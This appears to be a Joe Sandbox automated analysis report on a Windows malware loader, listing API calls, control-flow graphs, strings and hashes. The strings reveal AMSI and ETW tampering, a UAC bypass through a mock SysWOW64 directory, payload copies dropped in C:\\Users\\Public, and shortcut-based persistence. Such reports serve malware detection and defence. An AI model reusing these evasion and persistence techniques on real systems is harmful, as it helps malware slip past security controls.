                                                                      • ExitProcess.KERNEL32(00000000,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,Initialize,02D17380,02CBB7B8,00000000,00000000,00000000,ScanString,02D17380,02CBB7B8), ref: 02CBB2FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFileLibrary$CreateFreeHandlePathProcessThread$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcQueueResumeUserWrite
                                                                      • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                      • API String ID: 2961332323-3516509641
                                                                      • Opcode ID: 75d219f9b8476c2748745ccda0f75a7d5759776135ac5e076da642a0b2eb2b37
                                                                      • Instruction ID: 769271d1d89d1d258e3af2a80870eba269b2844d59e3e1b0f4588631943f3bb2
                                                                      • Opcode Fuzzy Hash: 75d219f9b8476c2748745ccda0f75a7d5759776135ac5e076da642a0b2eb2b37
                                                                      • Instruction Fuzzy Hash: 3D43F7B9A0411D9FCF25EBA4DC949CE73BAFF89304F5041E1E409AB614DA30AE92DF51
                                                                      Function 02CB3E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADD5E), ref: 02CADCCB
                                                                        • Part of subcall function 02CADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADD05
                                                                        • Part of subcall function 02CADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADD32
                                                                        • Part of subcall function 02CADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADD3B
                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,02CBBB30,00000000,00000000,02CBBB24,00000000,00000000), ref: 02CB40CB
                                                                        • Part of subcall function 02CA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02CA88C1
                                                                        • Part of subcall function 02CA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CA8920
                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,000003E8,ScanBuffer,02D17380,02CBB7B8,UacScan,02D17380), ref: 02CB4277
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      • Sleep.KERNEL32(00004E20,UacScan,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacInitialize,02D17380,02CBB7B8), ref: 02CB50EE
                                                                        • Part of subcall function 02CADC04: RtlI.N(?,?,00000000,02CADC7E), ref: 02CADC2C
                                                                        • Part of subcall function 02CADC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC42
                                                                        • Part of subcall function 02CADC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC61
                                                                        • Part of subcall function 02C97E5C: GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
                                                                        • Part of subcall function 02CA85BC: WinExec.KERNEL32(?,?), ref: 02CA8624
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                      • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                      • API String ID: 2171786310-3926298568
                                                                      • Opcode ID: 1986bc2150e17b2c00dac465f01ec12beddcd8cc34bcff6d10bcf4c44efb5dba
                                                                      • Instruction ID: 85b2ab5b3c4cfadf72382370c1faa3d39ec3794be0a9de85fdc95983f9c9094d
                                                                      • Opcode Fuzzy Hash: 1986bc2150e17b2c00dac465f01ec12beddcd8cc34bcff6d10bcf4c44efb5dba
                                                                      • Instruction Fuzzy Hash: D6433F75A0015D9FDF35EB64DC94ECE73BABF85308F1041E29409AB614CA70AE92EF51
                                                                      Function 02CAE678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 9257 2cae678-2cae67c 9258 2cae681-2cae686 9257->9258 9258->9258 9259 2cae688-2caec81 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94740 * 2 call 2c94860 call 2c94778 call 2c930d4 call 2c946d4 * 2 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94740 call 2c97f2c call 2c949a0 call 2c94d74 call 2c94df0 call 2c94740 call 2c949a0 call 2c94d74 call 2c94df0 call 2ca8788 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c 9258->9259 9462 2caeee2-2caef2f call 2c94500 call 2c94c60 call 2c94500 call 2c94c60 call 2c94500 9259->9462 9463 2caec87-2caeedd call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 WaitForSingleObject CloseHandle * 2 call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c call 2c94860 call 2c949a0 call 2c947ec call 2c949a0 call 2ca894c * 3 9259->9463 9463->9462
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02D17380,02CAEF4C,OpenSession,02D17380,02CAEF4C,UacScan,02D17380,02CAEF4C,ScanBuffer,02D17380,02CAEF4C,OpenSession,02D17380), ref: 02CAED6E
                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02D17380,02CAEF4C,OpenSession,02D17380,02CAEF4C,UacScan,02D17380,02CAEF4C,ScanBuffer,02D17380,02CAEF4C,OpenSession), ref: 02CAED76
                                                                      • CloseHandle.KERNEL32(00000BDC,00000000,00000000,000000FF,ScanString,02D17380,02CAEF4C,OpenSession,02D17380,02CAEF4C,UacScan,02D17380,02CAEF4C,ScanBuffer,02D17380,02CAEF4C), ref: 02CAED7F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                      • String ID: )"C:\Users\Public\Libraries\ovggtquW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                      • API String ID: 3475578485-4049182157
                                                                      • Opcode ID: 4d14965d7d257e7a63e8a6ca214f872a278c4ce483c76f0e62128f9d79692ee6
                                                                      • Instruction ID: 6a23caa7a5dac11473755619fc8b08fc3d9e0f3274b85a275e8c00b19d7f2607
                                                                      • Opcode Fuzzy Hash: 4d14965d7d257e7a63e8a6ca214f872a278c4ce483c76f0e62128f9d79692ee6
                                                                      • Instruction Fuzzy Hash: B222FD74A0015D9FEF24FBA4DC95B8EB3BAEF85308F5041B1A008AB254DB31AE46DF55
                                                                      Function 02C91724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 11426 2c91724-2c91736 11427 2c91968-2c9196d 11426->11427 11428 2c9173c-2c9174c 11426->11428 11431 2c91a80-2c91a83 11427->11431 11432 2c91973-2c91984 11427->11432 11429 2c9174e-2c9175b 11428->11429 11430 2c917a4-2c917ad 11428->11430 11433 2c9175d-2c9176a 11429->11433 11434 2c91774-2c91780 11429->11434 11430->11429 11437 2c917af-2c917bb 11430->11437 11438 2c91a89-2c91a8b 11431->11438 11439 2c91684-2c916ad VirtualAlloc 11431->11439 11435 2c91938-2c91945 11432->11435 11436 2c91986-2c919a2 11432->11436 11440 2c9176c-2c91770 11433->11440 11441 2c91794-2c917a1 11433->11441 11445 2c917f0-2c917f9 11434->11445 11446 2c91782-2c91790 11434->11446 11435->11436 11442 2c91947-2c9195b Sleep 11435->11442 11447 2c919b0-2c919bf 11436->11447 11448 2c919a4-2c919ac 11436->11448 11437->11429 11449 2c917bd-2c917c9 11437->11449 11443 2c916df-2c916e5 11439->11443 11444 2c916af-2c916dc call 2c91644 11439->11444 11442->11436 11450 2c9195d-2c91964 Sleep 11442->11450 11444->11443 11456 2c917fb-2c91808 11445->11456 11457 2c9182c-2c91836 11445->11457 11453 2c919d8-2c919e0 11447->11453 11454 2c919c1-2c919d5 11447->11454 11452 2c91a0c-2c91a22 11448->11452 11449->11429 11455 2c917cb-2c917de Sleep 11449->11455 11450->11435 11458 2c91a3b-2c91a47 11452->11458 11459 2c91a24-2c91a32 11452->11459 11464 2c919fc-2c919fe call 2c915cc 11453->11464 11465 2c919e2-2c919fa 11453->11465 11454->11452 11455->11429 11463 2c917e4-2c917eb Sleep 11455->11463 11456->11457 11466 2c9180a-2c9181e Sleep 11456->11466 11460 2c918a8-2c918b4 11457->11460 11461 2c91838-2c91863 11457->11461 11471 2c91a49-2c91a5c 11458->11471 11472 2c91a68 11458->11472 11459->11458 11468 2c91a34 11459->11468 11473 2c918dc-2c918eb call 2c915cc 11460->11473 11474 2c918b6-2c918c8 11460->11474 11469 2c9187c-2c9188a 11461->11469 11470 2c91865-2c91873 11461->11470 11463->11430 11475 2c91a03-2c91a0b 11464->11475 11465->11475 11466->11457 11467 2c91820-2c91827 Sleep 11466->11467 11467->11456 11468->11458 11478 2c918f8 11469->11478 11479 2c9188c-2c918a6 call 2c91500 11469->11479 11470->11469 11477 2c91875 11470->11477 11480 2c91a6d-2c91a7f 11471->11480 11481 2c91a5e-2c91a63 call 2c91500 11471->11481 11472->11480 11485 2c918fd-2c91936 11473->11485 11489 2c918ed-2c918f7 11473->11489 11482 2c918ca 11474->11482 11483 2c918cc-2c918da 11474->11483 11477->11469 11478->11485 11479->11485 11481->11480 11482->11483 11483->11485
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000,?,02C91FC1), ref: 02C917D0
                                                                      • Sleep.KERNEL32(0000000A,00000000,?,02C91FC1), ref: 02C917E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 54f7eac76745eb0b9cb60c6db6765ddb6bfcec31d9b166a77f3fd7623d43782d
                                                                      • Instruction ID: 21291ae2a4969e817bfefab096a4e408948cc9202870626fc5e44e624583a455
                                                                      • Opcode Fuzzy Hash: 54f7eac76745eb0b9cb60c6db6765ddb6bfcec31d9b166a77f3fd7623d43782d
                                                                      • Instruction Fuzzy Hash: EDB135B2A002429FCF16CF29D489355BBE1EF86315F1E86AED45D8B385C7B09952CBD0
                                                                      Function 02CA88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(amsi), ref: 02CA88C1
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CA8920
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                      • String ID: DllGetClassObject$W$amsi
                                                                      • API String ID: 941070894-2671292670
                                                                      • Opcode ID: 9640848cb2b7bb8e9a8396396a5c789138823d0fcc3a8b577c2bf0db74b9fe0d
                                                                      • Instruction ID: b61e0d3af90759443a7c936b94b3f7df77141d61bbe2592703a5b813140f732d
                                                                      • Opcode Fuzzy Hash: 9640848cb2b7bb8e9a8396396a5c789138823d0fcc3a8b577c2bf0db74b9fe0d
                                                                      • Instruction Fuzzy Hash: CFF0AF6154C382BAE700E3748C59F4FBECD5B62268F048B18B1E8AA2D2D679D1049B77
                                                                      Function 02C91A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 11514 2c91a8c-2c91a9b 11515 2c91b6c-2c91b6f 11514->11515 11516 2c91aa1-2c91aa5 11514->11516 11517 2c91c5c-2c91c60 11515->11517 11518 2c91b75-2c91b7f 11515->11518 11519 2c91b08-2c91b11 11516->11519 11520 2c91aa7-2c91aae 11516->11520 11521 2c916e8-2c9170b call 2c91644 VirtualFree 11517->11521 11522 2c91c66-2c91c6b 11517->11522 11524 2c91b3c-2c91b49 11518->11524 11525 2c91b81-2c91b8d 11518->11525 11519->11520 11523 2c91b13-2c91b27 Sleep 11519->11523 11526 2c91adc-2c91ade 11520->11526 11527 2c91ab0-2c91abb 11520->11527 11545 2c9170d-2c91714 11521->11545 11546 2c91716 11521->11546 11523->11520 11530 2c91b2d-2c91b38 Sleep 11523->11530 11524->11525 11531 2c91b4b-2c91b5f Sleep 11524->11531 11533 2c91b8f-2c91b92 11525->11533 11534 2c91bc4-2c91bd2 11525->11534 11528 2c91ae0-2c91af1 11526->11528 11529 2c91af3 11526->11529 11535 2c91abd-2c91ac2 11527->11535 11536 2c91ac4-2c91ad9 11527->11536 11528->11529 11537 2c91af6-2c91b03 11528->11537 11529->11537 11530->11519 11531->11525 11540 2c91b61-2c91b68 Sleep 11531->11540 11539 2c91b96-2c91b9a 11533->11539 11538 2c91bd4-2c91bd9 call 2c914c0 11534->11538 11534->11539 11537->11518 11538->11539 11543 2c91bdc-2c91be9 11539->11543 11544 2c91b9c-2c91ba2 11539->11544 11540->11524 11543->11544 11551 2c91beb-2c91bf2 call 2c914c0 11543->11551 11547 2c91bf4-2c91bfe 11544->11547 11548 2c91ba4-2c91bc2 call 2c91500 11544->11548 11549 2c91719-2c91723 11545->11549 11546->11549 11554 2c91c2c-2c91c59 call 2c91560 11547->11554 11555 2c91c00-2c91c28 VirtualFree 11547->11555 11551->11544
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000,?,?,00000000,02C91FE4), ref: 02C91B17
                                                                      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02C91FE4), ref: 02C91B31
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: c0b14390217a027b64d96cfb365a3eb66d46c88112b156eada6665d6b91a9096
                                                                      • Instruction ID: f10b81824797e86d704716db3fc59defab1a920b48f2555900383216b2fb2777
                                                                      • Opcode Fuzzy Hash: c0b14390217a027b64d96cfb365a3eb66d46c88112b156eada6665d6b91a9096
                                                                      • Instruction Fuzzy Hash: 2551C2B16412429FDF15CF68C98A756BBE1AF86314F1C85AED448CB382D7F0C946CB91
                                                                      Function 02CAE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CAE5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CheckConnectionInternet
                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                      • API String ID: 3847983778-3852638603
                                                                      • Opcode ID: 75c5f3b28b2736a498f4033db959c429f6863ace0b706346b77984b29b15b915
                                                                      • Instruction ID: ce801dccaf0beaef6d11a4f49f3b7cf4226c9f794b94f16bcd0d5242180f32d9
                                                                      • Opcode Fuzzy Hash: 75c5f3b28b2736a498f4033db959c429f6863ace0b706346b77984b29b15b915
                                                                      • Instruction Fuzzy Hash: 48410C75B1010D9FEF24EBA8D855EDEB3BAEF88708F204835E041A7251DA70AD02DF95
                                                                      Function 02CA85BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
